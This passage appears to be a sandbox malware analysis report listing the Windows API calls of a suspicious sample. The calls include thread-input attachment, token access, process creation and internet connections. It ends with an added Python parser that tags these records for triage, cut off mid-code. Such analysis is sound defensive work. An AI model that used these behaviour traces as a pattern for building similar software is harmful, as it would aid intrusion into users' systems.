                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                              • String ID:
                                                                              • API String ID: 3058430110-0
                                                                              • Opcode ID: eafdbf0cfe4c8db5570b82a23dac01eb2e07ad0b05b7359c017e715d387d3d7d
                                                                              • Instruction ID: 0cad01581de5b71c7653974b7667faf27081755492da858cc5d09d50bb1159d9
                                                                              • Opcode Fuzzy Hash: eafdbf0cfe4c8db5570b82a23dac01eb2e07ad0b05b7359c017e715d387d3d7d
                                                                              • Instruction Fuzzy Hash: 3531D030604A4AAFDB219F75C844BBB7BB5FF81310F15542AEB61CB1A0EB31D890DB90
                                                                              APIs
                                                                              • GetForegroundWindow.USER32 ref: 00927CB9
                                                                                • Part of subcall function 00905F55: GetWindowThreadProcessId.USER32(?,00000000), ref: 00905F6F
                                                                                • Part of subcall function 00905F55: GetCurrentThreadId.KERNEL32 ref: 00905F76
                                                                                • Part of subcall function 00905F55: AttachThreadInput.USER32(00000000,?,0090781F), ref: 00905F7D
                                                                              • GetCaretPos.USER32(?), ref: 00927CCA
                                                                              • ClientToScreen.USER32(00000000,?), ref: 00927D03
                                                                              • GetForegroundWindow.USER32 ref: 00927D09
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
Similarity
• API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
• String ID:
APIs
  • Part of subcall function 008DB34E: GetWindowLongW.USER32(?,000000EB), ref: 008DB35F
• GetCursorPos.USER32(?), ref: 0092F211
• TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0093E4C0,?,?,?,?,?), ref: 0092F226
• GetCursorPos.USER32(?), ref: 0092F270
• DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0093E4C0,?,?,?), ref: 0092F2A6
Similarity
• API ID: Cursor$LongMenuPopupProcTrackWindow
• String ID:
APIs
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00914358
  • Part of subcall function 009143E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00914401
  • Part of subcall function 009143E2: InternetCloseHandle.WININET(00000000), ref: 0091449E
Similarity
• API ID: Internet$CloseConnectHandleOpen
• String ID:
APIs
• GetWindowLongW.USER32(?,000000EC), ref: 00928AA6
• SetWindowLongW.USER32(?,000000EC,00000000), ref: 00928AC0
• SetWindowLongW.USER32(?,000000EC,00000000), ref: 00928ACE
• SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00928ADC
Similarity
• API ID: Window$Long$AttributesLayered
• String ID:
APIs
• select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 00918AE0
• __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00918AF2
• accept.WSOCK32(00000000,00000000,00000000), ref: 00918AFF
• WSAGetLastError.WSOCK32(00000000), ref: 00918B16
Similarity
• API ID: ErrorLastacceptselect
• String ID:
APIs
  • Part of subcall function 00901E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00900ABB,?,?,?,0090187A,00000000,000000EF,00000119,?,?), ref: 00901E77
  • Part of subcall function 00901E68: lstrcpyW.KERNEL32(00000000,?,?,00900ABB,?,?,?,0090187A,00000000,000000EF,00000119,?,?,00000000), ref: 00901E9D
  • Part of subcall function 00901E68: lstrcmpiW.KERNEL32(00000000,?,00900ABB,?,?,?,0090187A,00000000,000000EF,00000119,?,?), ref: 00901ECE
• lstrlenW.KERNEL32(?,00000002,?,?,?,?,0090187A,00000000,000000EF,00000119,?,?,00000000), ref: 00900AD4
• lstrcpyW.KERNEL32(00000000,?,?,0090187A,00000000,000000EF,00000119,?,?,00000000), ref: 00900AFA
• lstrcmpiW.KERNEL32(00000002,cdecl,?,0090187A,00000000,000000EF,00000119,?,?,00000000), ref: 00900B2E
Strings
Similarity
• API ID: lstrcmpilstrcpylstrlen
• String ID: cdecl
APIs
• _free.LIBCMT ref: 008F2FB5
  • Part of subcall function 008E395C: __FF_MSGBANNER.LIBCMT ref: 008E3973
  • Part of subcall function 008E395C: __NMSG_WRITE.LIBCMT ref: 008E397A
  • Part of subcall function 008E395C: RtlAllocateHeap.NTDLL(00FA0000,00000000,00000001,00000001,00000000,?,?,008DF507,?,0000000E), ref: 008E399F
Similarity
• API ID: AllocateHeap_free
• String ID:
APIs
• _memset.LIBCMT ref: 008DEBB2
  • Part of subcall function 008C51AF: _memset.LIBCMT ref: 008C522F
  • Part of subcall function 008C51AF: _wcscpy.LIBCMT ref: 008C5283
  • Part of subcall function 008C51AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 008C5293
• KillTimer.USER32(?,00000001,?,?), ref: 008DEC07
• SetTimer.USER32(?,00000001,000002EE,00000000), ref: 008DEC16
• Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00933C88
Similarity
• API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
• String ID:
APIs
• GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 009005AC
• LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 009005C7
• RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 009005DD
• FreeLibrary.KERNEL32(?), ref: 00900632
Similarity
• API ID: Type$FileFreeLibraryLoadModuleNameRegister
• String ID:
APIs
• CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00906733
• _memset.LIBCMT ref: 00906754
• DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 009067A6
• CloseHandle.KERNEL32(00000000), ref: 009067AF
Similarity
• API ID: CloseControlCreateDeviceFileHandle_memset
• String ID:
APIs
  • Part of subcall function 008FAA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 008FAA79
  • Part of subcall function 008FAA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 008FAA83
  • Part of subcall function 008FAA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 008FAA92
  • Part of subcall function 008FAA62: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 008FAA99
  • Part of subcall function 008FAA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 008FAAAF
• GetLengthSid.ADVAPI32(?,00000000,008FADE4,?,?), ref: 008FB21B
• GetProcessHeap.KERNEL32(00000008,00000000), ref: 008FB227
• HeapAlloc.KERNEL32(00000000), ref: 008FB22E
• CopySid.ADVAPI32(?,00000000,?), ref: 008FB247
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Heap$AllocInformationProcessToken$CopyErrorLastLength
                                                                              • String ID:
                                                                              • API String ID: 4217664535-0
                                                                              • Opcode ID: 35819177096d810c0aff2e4fe694229de27bf5dab53dd5bcd5ca60fb1825e4a3
                                                                              • Instruction ID: 12873bf31f5048e5db1daa4202ff08107197e61e672d85cb6ed866a6dc9c8e68
                                                                              • Opcode Fuzzy Hash: 35819177096d810c0aff2e4fe694229de27bf5dab53dd5bcd5ca60fb1825e4a3
                                                                              • Instruction Fuzzy Hash: E5119175A11209EFDB189FA8DC95EBEB7A9FF85314F14802DEA42D7210D731AE44DB10
                                                                              APIs
                                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 008FB498
                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 008FB4AA
                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 008FB4C0
                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 008FB4DB
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID:
                                                                              • API String ID: 3850602802-0
                                                                              • Opcode ID: 23c3d4c09fc32572d2f9b18ef02b1c89138a2426ba067b5fb645bac0e6819d9f
                                                                              • Instruction ID: 66bb5a65886dcba6d5d765e280eed271b403160fc3d3b1e080154c7b7826a085
                                                                              • Opcode Fuzzy Hash: 23c3d4c09fc32572d2f9b18ef02b1c89138a2426ba067b5fb645bac0e6819d9f
                                                                              • Instruction Fuzzy Hash: E9112A7A900218FFDB11DFA9C985EADBBB4FB08710F204091E604F7295D771AE51DB94
                                                                              APIs
                                                                                • Part of subcall function 008DB34E: GetWindowLongW.USER32(?,000000EB), ref: 008DB35F
                                                                              • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 008DB5A5
                                                                              • GetClientRect.USER32(?,?), ref: 0093E69A
                                                                              • GetCursorPos.USER32(?), ref: 0093E6A4
                                                                              • ScreenToClient.USER32(?,?), ref: 0093E6AF
                                                                              Similarity
                                                                              • API ID: Client$CursorLongProcRectScreenWindow
                                                                              • String ID:
                                                                              • API String ID: 4127811313-0
                                                                              • Opcode ID: cae48e00225c12d65c10accee574651eb2b98bba57b988d57f69080b2898ea2b
                                                                              • Instruction ID: 6605f9d078ccdd674517083008c83bb7198609bc7fc05467820a6db65653429c
                                                                              • Opcode Fuzzy Hash: cae48e00225c12d65c10accee574651eb2b98bba57b988d57f69080b2898ea2b
                                                                              • Instruction Fuzzy Hash: 31113635901029FFCF14DF98E846DAE77B9FB09308F010552F941E7240D730AA92DBA1
                                                                              APIs
                                                                              • GetCurrentThreadId.KERNEL32 ref: 00907352
                                                                              • MessageBoxW.USER32(?,?,?,?), ref: 00907385
                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0090739B
                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 009073A2
                                                                              Similarity
                                                                              • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                              • String ID:
                                                                              • API String ID: 2880819207-0
                                                                              • Opcode ID: 10f72fd40709c12833a4b9b9fd68471ee0599878520ef4a6b56957b82a1a3aeb
                                                                              • Instruction ID: 460525237c67dc1dc19d0b6ba8d9995d70561ff77cabccb628903d4440cabea1
                                                                              • Opcode Fuzzy Hash: 10f72fd40709c12833a4b9b9fd68471ee0599878520ef4a6b56957b82a1a3aeb
                                                                              • Instruction Fuzzy Hash: 1B110876A18204BFD7119FACDC05E9EBBADAB45324F044355FD31D3391D6709D00A7A1
                                                                              APIs
                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 008DD1BA
                                                                              • GetStockObject.GDI32(00000011), ref: 008DD1CE
                                                                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 008DD1D8
                                                                              Similarity
                                                                              • API ID: CreateMessageObjectSendStockWindow
                                                                              • String ID:
                                                                              • API String ID: 3970641297-0
                                                                              • Opcode ID: 28df766757c2f57f05bce80dfcbf8dc768d6d4ea422584a8a2ee46b7abc2a7a6
                                                                              • Instruction ID: 96dbb54dfba0b0bd8f150b67eb42b49233b3ef9d4beb7cbef0d8208c23714384
                                                                              • Opcode Fuzzy Hash: 28df766757c2f57f05bce80dfcbf8dc768d6d4ea422584a8a2ee46b7abc2a7a6
                                                                              • Instruction Fuzzy Hash: 6111C0B6106609BFEF124FA0DC50EEABB6DFF09368F040202FA1592250C731DC60EBA0
                                                                              APIs
                                                                              Similarity
                                                                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                              • String ID:
                                                                              • API String ID: 3016257755-0
                                                                              • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                              • Instruction ID: 3fc8e776d2725bfea57f8ebef7f8a364348824979a417838c1c169c12ecef562
                                                                              • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                              • Instruction Fuzzy Hash: 4B014C7604014EBBCF125EA8DC018EE3F63FB18364B589456FF2899131D336CAB1AB81
                                                                              APIs
                                                                                • Part of subcall function 008E7A0D: __getptd_noexit.LIBCMT ref: 008E7A0E
                                                                              • __lock.LIBCMT ref: 008E748F
                                                                              • InterlockedDecrement.KERNEL32(?), ref: 008E74AC
                                                                              • _free.LIBCMT ref: 008E74BF
                                                                              • InterlockedIncrement.KERNEL32(00FB33E0), ref: 008E74D7
                                                                              Similarity
                                                                              • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                                              • String ID:
                                                                              • API String ID: 2704283638-0
                                                                              • Opcode ID: 8269c3704f343e1fcaa59f6e57b8741e5053ea2fbb8b122494a04995c84291cc
                                                                              • Instruction ID: 48a7220fa320f8bdbdb671dbd4a768d8037b8ce699fa85c8b447f15a8b29bb28
                                                                              • Opcode Fuzzy Hash: 8269c3704f343e1fcaa59f6e57b8741e5053ea2fbb8b122494a04995c84291cc
                                                                              • Instruction Fuzzy Hash: CA01A13290A661ABE722AF6B940975DBB60FF47718F144005F818E76C0C7305941DFDB
                                                                              APIs
                                                                              • __lock.LIBCMT ref: 008E7AD8
                                                                                • Part of subcall function 008E7CF4: __mtinitlocknum.LIBCMT ref: 008E7D06
                                                                                • Part of subcall function 008E7CF4: EnterCriticalSection.KERNEL32(00000000,?,008E7ADD,0000000D), ref: 008E7D1F
                                                                              • InterlockedIncrement.KERNEL32(?), ref: 008E7AE5
                                                                              • __lock.LIBCMT ref: 008E7AF9
                                                                              • ___addlocaleref.LIBCMT ref: 008E7B17
                                                                              Similarity
                                                                              • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                                              • String ID:
                                                                              • API String ID: 1687444384-0
                                                                              • Opcode ID: 4d130d49497130c32399c03301a85cdda3bf299026e2333d66c6850c47147631
                                                                              • Instruction ID: 92679453e3433782f27b5236cd86684eacebb5b0fd4c2d5da8b1d304989db069
                                                                              • Opcode Fuzzy Hash: 4d130d49497130c32399c03301a85cdda3bf299026e2333d66c6850c47147631
                                                                              • Instruction Fuzzy Hash: C8015B72404B41EED7309F7AC90574AB7E0FF91325F20890EA49AD62A0DBB0A680CB02
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 0092E33D
                                                                              • _memset.LIBCMT ref: 0092E34C
                                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00983D00,00983D44), ref: 0092E37B
                                                                              • CloseHandle.KERNEL32 ref: 0092E38D
                                                                              Similarity
                                                                              • API ID: _memset$CloseCreateHandleProcess
                                                                              • String ID:
                                                                              • API String ID: 3277943733-0
                                                                              • Opcode ID: bdae09d956b7c25ca2f020e0cdee690bcb07f72c3a8aca7b16ee68bec11b1e82
                                                                              • Instruction ID: 49b8f3bff4da59e1f58bdbc8aafb0af8e0a67ebb8530b184d1be2e4c65c99696
                                                                              • Opcode Fuzzy Hash: bdae09d956b7c25ca2f020e0cdee690bcb07f72c3a8aca7b16ee68bec11b1e82
                                                                              • Instruction Fuzzy Hash: 38F0E2F4221304BEE3102BA5AC45F773E9CEB05F14F008420FE08D62E2D3B19E00A7A8
                                                                              APIs
                                                                                • Part of subcall function 008DAF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 008DAFE3
                                                                                • Part of subcall function 008DAF83: SelectObject.GDI32(?,00000000), ref: 008DAFF2
                                                                                • Part of subcall function 008DAF83: BeginPath.GDI32(?), ref: 008DB009
                                                                                • Part of subcall function 008DAF83: SelectObject.GDI32(?,00000000), ref: 008DB033
                                                                              • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0092EA8E
                                                                              • LineTo.GDI32(00000000,?,?), ref: 0092EA9B
                                                                              • EndPath.GDI32(00000000), ref: 0092EAAB
                                                                              • StrokePath.GDI32(00000000), ref: 0092EAB9
                                                                              Similarity
                                                                              • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                              • String ID:
                                                                              • API String ID: 1539411459-0
                                                                              • Opcode ID: 051219ac7713485c9717ac3a88b852dc6dc1e8e0f5e405e980a55ada90b59c54
                                                                              • Instruction ID: e4b56841f10a27d60f6975e94657085e5c1855effb3ea9a574581f6c7f27761e
                                                                              • Opcode Fuzzy Hash: 051219ac7713485c9717ac3a88b852dc6dc1e8e0f5e405e980a55ada90b59c54
                                                                              • Instruction Fuzzy Hash: AAF0823901A269BBDB129FA4AC0EFCE3F1DAF17311F144201FE11611E187B49552EB95
                                                                              APIs
                                                                              • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 008FC84A
                                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 008FC85D
                                                                              • GetCurrentThreadId.KERNEL32 ref: 008FC864
                                                                              • AttachThreadInput.USER32(00000000), ref: 008FC86B
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                              • String ID:
                                                                              • API String ID: 2710830443-0
                                                                              • Opcode ID: bbf35d09d71e50be3dbe5d79fede841d21b35a4391471f30aab6db4c02061e72
                                                                              • Instruction ID: 4966fa7bbe8f4be963b3c9f48e2bb5f25ab25f10f6115c443a97346150d0655a
                                                                              • Opcode Fuzzy Hash: bbf35d09d71e50be3dbe5d79fede841d21b35a4391471f30aab6db4c02061e72
                                                                              • Instruction Fuzzy Hash: B3E0307915622C76DB201B619C0DEDB7F1CEF067A1F008421B60DC4450C6718580D7E0
                                                                              APIs
                                                                              • GetCurrentThread.KERNEL32 ref: 008FB0D6
                                                                              • OpenThreadToken.ADVAPI32(00000000,?,?,?,008FAC9D), ref: 008FB0DD
                                                                              • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,008FAC9D), ref: 008FB0EA
                                                                              • OpenProcessToken.ADVAPI32(00000000,?,?,?,008FAC9D), ref: 008FB0F1
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CurrentOpenProcessThreadToken
                                                                              • String ID:
                                                                              • API String ID: 3974789173-0
                                                                              • Opcode ID: 14904a103281df1938b3a72c29a0161a977ed566e24f2eacad22c7e2d6725114
                                                                              • Instruction ID: 1fe9fd78762b80db13a81ad9c739603461ab0f8bb874d64d1598c04610e44205
                                                                              • Opcode Fuzzy Hash: 14904a103281df1938b3a72c29a0161a977ed566e24f2eacad22c7e2d6725114
                                                                              • Instruction Fuzzy Hash: 1EE0863E7162119BD7201FB19C0CF573BA8FF96795F018828F741D6040DB348401D760
                                                                              APIs
                                                                              • GetSysColor.USER32(00000008), ref: 008DB496
                                                                              • SetTextColor.GDI32(?,000000FF), ref: 008DB4A0
                                                                              • SetBkMode.GDI32(?,00000001), ref: 008DB4B5
                                                                              • GetStockObject.GDI32(00000005), ref: 008DB4BD
                                                                              • GetWindowDC.USER32(?,00000000), ref: 0093DE2B
                                                                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 0093DE38
                                                                              • GetPixel.GDI32(00000000,?,00000000), ref: 0093DE51
                                                                              • GetPixel.GDI32(00000000,00000000,?), ref: 0093DE6A
                                                                              • GetPixel.GDI32(00000000,?,?), ref: 0093DE8A
                                                                              • ReleaseDC.USER32(?,00000000), ref: 0093DE95
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                              • String ID:
                                                                              • API String ID: 1946975507-0
                                                                              • Opcode ID: 08d33e2a1e9710f94c4c1b71d8f5ef6d20d29cfa072a662e6661f3faada72a7f
                                                                              • Instruction ID: aeeef06193a20e77c2a0934c2af7d9baf2a20e6427ae05167e89e7ff695d2644
                                                                              • Opcode Fuzzy Hash: 08d33e2a1e9710f94c4c1b71d8f5ef6d20d29cfa072a662e6661f3faada72a7f
                                                                              • Instruction Fuzzy Hash: 3CE06D39119280AAEB215B64BC09FD83F11AB17339F00C326FABA980E2C7714580EB11
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CapsDesktopDeviceReleaseWindow
                                                                              • String ID:
                                                                              • API String ID: 2889604237-0
                                                                              • Opcode ID: 28c17bb7e285d562376fec65ef8338433382bfca108ba63e1f02260c35fe27e8
                                                                              • Instruction ID: 51c52152681ed9a980b0287059ea90104628b1a25f1b64c26303a9a6bd0088e5
                                                                              • Opcode Fuzzy Hash: 28c17bb7e285d562376fec65ef8338433382bfca108ba63e1f02260c35fe27e8
                                                                              • Instruction Fuzzy Hash: A5E012BD125204EFDB015F70C848A2E7BA8FB4D354F12890AF95A8B210CB789840AB40
                                                                              APIs
                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 008FB2DF
                                                                              • UnloadUserProfile.USERENV(?,?), ref: 008FB2EB
                                                                              • CloseHandle.KERNEL32(?), ref: 008FB2F4
                                                                              • CloseHandle.KERNEL32(?), ref: 008FB2FC
                                                                                • Part of subcall function 008FAB24: GetProcessHeap.KERNEL32(00000000,?,008FA848), ref: 008FAB2B
                                                                                • Part of subcall function 008FAB24: HeapFree.KERNEL32(00000000), ref: 008FAB32
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                              • String ID:
                                                                              • API String ID: 146765662-0
                                                                              • Opcode ID: 89aab322d4d137209bc47b1d651a2a4c28ee5274ff08025f81e2614acd921eb0
                                                                              • Instruction ID: 4ce2e227bca223691a8edcfefb8dbd6c0b05a32fd61b936ecef6cfaf6870c1bb
                                                                              • Opcode Fuzzy Hash: 89aab322d4d137209bc47b1d651a2a4c28ee5274ff08025f81e2614acd921eb0
                                                                              • Instruction Fuzzy Hash: 5CE0B67E11A005BBCB022FA5EC08C5DFBA6FF8A7253108221F62581575CB32A871FB91
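The records above are the report's per-function API listings for the sample, which the report flags as a likely compiled AutoIt script: the SendMessageTimeoutW / GetWindowThreadProcessId / GetCurrentThreadId / AttachThreadInput sequence at 008FC84A-008FC86B, the OpenThreadToken / OpenProcessToken pair at 008FB0D6-008FB0F1, and the WaitForSingleObject / UnloadUserProfile / CloseHandle record with its HeapFree subcall at 008FB2DF-008FB2FC. When a report has thousands of such records, reading them by hand does not scale. As an added example, not part of the Joe Sandbox report and not Joe Sandbox code, the Python below parses records in exactly this layout ("• Name.MODULE(args), ref: ADDR", the no-argument form "• Name.MODULE ref: ADDR", and the indented "Part of subcall function ADDR:" form) into structured call lists, then applies a small triage table. The SAMPLE text is constructed from those three records' own lines; the TAGS table and its labels are my own heuristics and assumptions, not Joe Sandbox signatures.

```python
"""Parse Joe Sandbox function-metadata records ("APIs" ... "Similarity") into
structured API calls and tag them for triage.  Added example; not part of the
Joe Sandbox report or of the analysed sample."""
import re
from typing import Dict, List, Set

# One call line.  Forms seen in the report:
#   • Name.MODULE(args), ref: ADDR
#   • Name.MODULE ref: ADDR
#   • Part of subcall function PARENT: Name.MODULE(args), ref: ADDR
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<parent>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\w+)\.(?P<module>[\w.]+)(?:\((?P<args>.*)\))?,?\s*ref:\s*"
    r"(?P<addr>[0-9A-Fa-f]+)\s*$"
)
# Key/value fields such as "• API ID: ..." or "• Instruction Fuzzy Hash: ...".
FIELD_RE = re.compile(r"^\s*•\s*(?P<key>[\w ]+):\s*(?P<val>.*)$")

# Triage heuristics (assumption: my own table, not a Joe Sandbox rule).  A tag is
# earned when every API in its set is called directly by one function.
TAGS = {
    "foreign-thread input attach": {"AttachThreadInput", "GetWindowThreadProcessId"},
    "own-token inspection": {"OpenProcessToken"},
    "run-as profile unload": {"UnloadUserProfile"},
}

# Constructed sample: three records copied in the report's layout.
SAMPLE = """\
APIs
• SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 008FC84A
• GetWindowThreadProcessId.USER32(?,00000000), ref: 008FC85D
• GetCurrentThreadId.KERNEL32 ref: 008FC864
• AttachThreadInput.USER32(00000000), ref: 008FC86B
Memory Dump Source
• Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
Similarity
• API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
• API String ID: 2710830443-0
APIs
• GetCurrentThread.KERNEL32 ref: 008FB0D6
• OpenThreadToken.ADVAPI32(00000000,?,?,?,008FAC9D), ref: 008FB0DD
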